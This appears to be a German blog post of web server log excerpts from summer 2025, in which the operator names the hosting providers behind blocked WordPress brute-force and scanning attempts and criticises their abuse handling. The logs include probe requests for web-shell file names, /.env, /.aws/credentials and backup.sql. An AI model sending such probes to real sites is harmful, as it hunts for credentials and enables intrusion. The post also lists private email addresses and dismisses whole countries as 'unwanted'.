79.99.40.32 website*x.com – – [02/Aug/2025:10:11:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

AS44388 – IT CONCEPT SRL – VERY GOOD PROVIDER! – ALWAYS STOPS THIS HACKER-IDIOTS VERY FAST!
support@tophost.md – ALWAYS REPLY TO OUR ABUSE-REPORTS!
195.178.106.195 website*x.com – – [02/Aug/2025:10:16:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“

MAIL NR. 13 TODAY!

AS16276 – OVH SAS – AGAIN AND AGAIN! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca
162.19.58.174 website*x.com – – [02/Aug/2025:10:28:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“

AS265831 – SOC. COMERCIAL WIRENET CHILE LTDA. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@wirenetchile.com
138.117.148.151 website*x.com – – [02/Aug/2025:10:33:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“

AS398101 – GoDaddy.com, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@godaddy.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!
2603:3:610c:cc20:: website*x.com – – [02/Aug/2025:10:39:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“

MAIL NR. 14 TODAY!

AS19853 – OrangeHost – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@orangehost.com,abuse@askiran.com
173.252.167.50 website*x.com – – [02/Aug/2025:10:45:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“

AS39308 – ANDISHE SABZ KHAZAR CO. P.J.S. – IRAN IS VERY UNWANTED! COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@askiran.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
89.144.145.213 website*x.com – – [02/Aug/2025:10:50:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS8860 – Delta HighTech Ltd. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@delta.bg – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a02:80e0:3::2 website*x.com – – [02/Aug/2025:10:56:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 15 TODAY!

AS199695 – PT Anym Network Indonesia – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@anymhost.co.id – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a12:bec4:1620:3::4a14:de0c website*x.com – – [02/Aug/2025:11:01:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“

AS135917 – Cong ty TNHH Web Panda – VIETNAM IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ducdung@tadu.vn,hm-changed@vnnic.vn – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.90.232.143 website*x.com – – [02/Aug/2025:11:07:16 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „http://website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“

Schauen wir nun mal, welcher PROVIDER WIRKLICH VERANTWORTUNGSBEWUSST REAGIERT!

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für all diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll Juli 2025

Das Hacker Protokoll Juli 2025

Dieses Hacker Protokoll Juli 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll Juli 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vom Juli. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

Protokoll-Auszüge ab 31.07.25 – TOP-PROVIDER und absolut fragwürdige Provider!

EIN ABSOLUT VORBILDLICHER PROVIDER:

AS214640 – Hostup AB – TOP! Antwortet sehr schnell, gibt Information über geschlossene Sicherheitslücke – VORBILDLICH!
noc@hostup.se
206.168.213.189 website*1.com – – [31/Jul/2025:07:41:58 +0200] „POST /wp-login.php HTTP/1.0“ 302 20 „http://irmsecure.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“

Ein für uns sehr fragwürdiger und UNSICHERER PROVIDER – Täglich wiederkehrende Hacker-Idioten! ALIBABA ist absolut unerwünscht und komplett gesperrt:

AS37963 – Hangzhou Alibaba Advertising Co.,Ltd.
abuse@alibaba-inc.com
8.134.130.210 website*1.com – – [31/Jul/2025:07:29:46 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://irmsecure.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“

Absolut IGNORANTER und UNSICHERER PROVIDER. Hacking-Versuche über gleiche IP gehen immer weiter! TENCENT ist absolut unerwünscht und komplett gesperrt:

AS132203 – Tencent Building, Kejizhongyi Avenue
qcloud_net_duty@tencent.com
43.156.242.13 website*1.de – – [31/Jul/2025:09:28:31 +0200] „GET /ss.php?f_c=1 HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36“

Auch andere, wie z.B. Abuseipdb haben da bzgl. TENCENT unzählige Abuse-Meldungen!

Info bzgl. unserer Abuse-Mails vom Wochenende sowie zweite Abuse-Mail vom 29.07.2025!

Diese 3 für uns jetzt sehr fragwürdige Provider, dessen Netzwerke sind jetzt über unser Security-Tool auf SEHR VIELEN Websites gesperrt!

Absolut IGNORANTE PROVIDER! KEINE REAKTION auf unsere Abuse-Mails, auch die zweite Abuse-Mail, KEINE ANTWORT… NICHTS!!!

AS9299 – Philippine Long Distance Telephone Company – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@pldt.net
2001:4452:48a:6e00:963:cb55:3fae:b319 website*1.com – – [29/Jul/2025:05:59:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/13.0.0.0 Safari/537.36“

AS262300 – SUPER CONNECT TELECOM LTDA – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
jorge.iwano@gmail.com,betotb@hotmail.com
2804:788:510:1700:d984:89f6:23c:eeb2 website*1.com – – [29/Jul/2025:05:59:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/97.0.0.0 Safari/537.36“

AS9329 – Sri Lanka Telecom Internet – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@slt.lk
2402:d000:8120:1a80:d51a:38db:e111:18c4 website*1.com – – [29/Jul/2025:05:59:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/85.0.0.0 Safari/537.36“

IGNORANZ und/oder ARROGANZ wird bei uns mit Veröffentlichung belohnt!!!

Protokoll-Auszüge ab 26.07.25 – Hier mal so einige der Hacker-Idioten vom Wochenende!

Heute Morgen gingen dann die ABUSE-MAILS an die MIT VERANTWORTLICHEN PROVIDER raus:

Samstag, 10 Abuse-Mails an jeweils 2 bis 4 Provider!
Sonntag, 11 Abuse-Mails an jeweils 2 bis 4 Provider!

Bei den Meldungen sind auch die entsprechenden Bemerkungen aufgeführt denn so einige scheinen das Thema SICHERHEIT nicht wirklich ernst zu nehmen. Auch die IGNORANZ so einger Provider ist absolut NICHT AKZEPTABEL!

Provider, die da untätig bleiben, unterstützen die Hacker-Idioten, dessen sollten sich so einige Provider mal klar sein!

SAMSTAG!

ABUSE-MAIL NR. 1

AS9299 – Philippine Long Distance Telephone Company – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@pldt.net
112.201.135.152 website*x.com – – [26/Jul/2025:03:16:26 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/70.0.0.0 Safari/537.36“

AS8075 – Microsoft Corporation – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com,msftcs@microsoft.com, azsafety@microsoft.com – Das ONLINE-FORMULAR IST EIN NoGo! Abuse per Emails ist STANDARD!!!
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:05 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:05 +0200] „GET /wp-includes/blocks/button/ff2.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:06 +0200] „GET /wp-admin/includes/class-wp-filesystem-base.php HTTP/1.0“ 302 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:17 +0200] „GET /wp-content/plugins/wp-file-manager/lib/php/elFinderVolumeFTP.class.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:18 +0200] „GET /wp-content/plugins/file-manager-advanced/application/library/php/elFinderVolumeFTP.class.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:18 +0200] „GET /amp.php HTTP/1.0“ 302 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:18 +0200] „GET /wp-content/wp-conflg.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:19 +0200] „GET /networks.php HTTP/1.0“ 302 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:34 +0200] „GET /wp-includes/images/autoload_classmap.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:34 +0200] „GET /wp-includes/images/install.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:34 +0200] „GET /wp-includes/images/ORVX-l3B0tq.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:34 +0200] „GET /wp-includes/images/brand.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:35 +0200] „GET /wp-includes/images/chosen.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:35 +0200] „GET /wp-includes/images/mah.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:35 +0200] „GET /wp-includes/images/defaults.php/wp-admin/includes/class-wp-filesystem-base.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:35 +0200] „GET /buy.php HTTP/1.0“ 403 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:36 +0200] „GET /simple.php HTTP/1.0“ 302 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:41:51 +0200] „GET /chosen.php HTTP/1.0“ 302 – „-“ „-“
4.216.95.134 website*x.com – – [26/Jul/2025:12:42:06 +0200] „GET /core/includes/includes/includes/includes/includes/includes/includes/cache.php HTTP/1.0“ 403 – „-“ „-“

AS210558 – 1337 Services GmbH – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@as210558.net,office@1337-service.de – DAILY REFERRER-SPAM TO THIS DUBIOUS WEBSITE AND THE PROVIDER DOES NOTHING!!!
45.80.158.232 website*x.com – – [26/Jul/2025:10:52:21 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

ABUSE-MAIL NR. 2

AS8708 – DIGI ROMANIA S.A.
abuse@rcs-rds.ro
82.77.245.187 website*x.com – – [26/Jul/2025:03:55:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/14.0.0.0 Safari/537.36“

AS270581 – JET NETWORK TELECOMUNICAÇÃO LTDA – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
contato@jetnetwork.com.br,europadino13@icloud.com,gustavo@elevatenetwork.com.br
2804:6e30:ffff:e493:bddc:ee26:31a2:e647 website*x.com – – [26/Jul/2025:03:56:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Opera/69.0.0.0 Safari/537.36“

AS140947 – SnTHostings – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! – NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@snthostings.com
103.153.182.150 website*x.com – – [26/Jul/2025:04:45:50 +0200] „GET /log-mama/function.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
103.153.182.150 website*x.com – – [26/Jul/2025:04:45:50 +0200] „GET /bk/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS8075 – Microsoft Corporation – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – – Das ONLINE-FORMULAR IST EIN NoGo! Abuse per Emails ist STANDARD!!!
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:01 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:01 +0200] „GET /wp-links.php HTTP/1.0“ 302 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:16 +0200] „GET /lock6.php HTTP/1.0“ 302 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:31 +0200] „GET /abe.php HTTP/1.0“ 302 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:46 +0200] „GET /wp-includes/IXR/about.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:47 +0200] „GET /wp-content/plugins/wp-login.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:47 +0200] „GET /.well-known/index.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:47 +0200] „GET /cgi-bin/admin.phphttps://explorebabel.com/.well-known/acme-challenge/index.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:47 +0200] „GET /wp-admin/user/cloud.php HTTP/1.0“ 302 – „-“ „-“
… and so on!!!

ABUSE-MAIL NR. 3

AS214943 – Railnet LLC – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virtualine.org
213.209.143.116 website*x.de – – [26/Jul/2025:03:00:48 +0200] „GET / HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0“
213.209.143.116 website*x.de – – [26/Jul/2025:03:00:49 +0200] „GET /.env HTTP/1.0“ 302 – „-“ „Mozilla/5.0“
213.209.143.116 website*x.de – – [26/Jul/2025:03:00:55 +0200] „GET /config.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0“
213.209.143.116 website*x.de – – [26/Jul/2025:03:00:55 +0200] „GET /settings.yaml HTTP/1.0“ 302 – „-“ „Mozilla/5.0“
213.209.143.116 website*x.de – – [26/Jul/2025:03:00:55 +0200] „GET /backup.sql HTTP/1.0“ 302 – „-“ „Mozilla/5.0“
213.209.143.116 website*x.de – – [26/Jul/2025:03:00:56 +0200] „GET /site.bak HTTP/1.0“ 302 – „-“ „Mozilla/5.0“

AS6805 – Telefonica Germany GmbH & Co.OHG – DAILY TRY TO COPY PICURES! – THERE ARE ALSO PICTURES WITH COPYRIGHT! NETWORK IS BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse.de@telefonica.com
176.2.189.207 www.website*x.de – – [26/Jul/2025:03:10:21 +0200] „GET /wp-content/uploads/202X/12/cropped-bildx-180×180.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.189.207 www.website*x.de – – [26/Jul/2025:03:10:21 +0200] „GET /wp-content/uploads/202X/05/Icon_bildx_150px.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.189.207 www.website*x.de – – [26/Jul/2025:03:10:21 +0200] „GET /wp-content/uploads/202X/12/cropped-bildx-192×192.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.189.207 www.website*x.de – – [26/Jul/2025:03:10:21 +0200] „GET /wp-content/uploads/202X/12/cropped-bildx-32×32.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.189.207 www.website*x.de – – [26/Jul/2025:03:10:21 +0200] „GET /wp-content/uploads/202X/01/Icon-bildx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.189.207 www.website*x.de – – [26/Jul/2025:03:10:22 +0200] „GET /wp-content/uploads/202X/12/cropped-bildx-270×270.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“

AS199785 – Cloud Hosting Solutions, Limited. – ALSO NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@standart.lv,abuse@chosting.solutions
176.126.103.125 website*x.de – – [26/Jul/2025:04:03:20 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:03:20 +0200] „GET /phpinfo.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:03:30 +0200] „GET /test.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:03:40 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:03:40 +0200] „GET /info.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:03:50 +0200] „GET /php.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:00 +0200] „GET /php_info.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:10 +0200] „GET /i.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:20 +0200] „GET /pi.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:30 +0200] „GET /config.phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:30 +0200] „GET /admin/phpinfo.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:30 +0200] „GET /.aws/credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:30 +0200] „GET /pinfo.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:40 +0200] „GET /phpinfo2.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:04:50 +0200] „GET /php_version.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:05:00 +0200] „GET /version.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:05:10 +0200] „GET /server-info.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:05:20 +0200] „GET /env.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
176.126.103.125 website*x.de – – [26/Jul/2025:04:05:30 +0200] „GET /init.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

ABUSE-MAIL NR. 4

AS48693 – Rices Privately owned enterprise – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ntup.net
194.145.227.125 website*x.com – – [26/Jul/2025:08:54:43 +0200] „GET /administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

AS56380 – “IT FRUIT“ S.R.L. – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@vmbox.cloud,terletskydboss@gmail.com – NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!!
185.153.199.135 website*x.com – – [26/Jul/2025:09:55:30 +0200] „GET /administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“

ABUSE-MAIL NR. 5

AS210558 – 1337 Services GmbH – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@as210558.net – DAILY REFERRER-SPAM TO THIS DUBIOUS WEBSITE AND THE PROVIDER DOES NOTHING!!!
45.80.158.232 website*x.com – – [26/Jul/2025:07:46:21 +0200] „GET /wp-admin/css/ HTTP/1.0“ 403 – „binance.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36“

AS24961 – WIIT AG – VERY IGNORANT, DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@myloc.de
89.163.242.76 website*x.com – – [26/Jul/2025:08:15:24 +0200] „GET /thoms.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:15:45 +0200] „GET /thoms.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:16:20 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
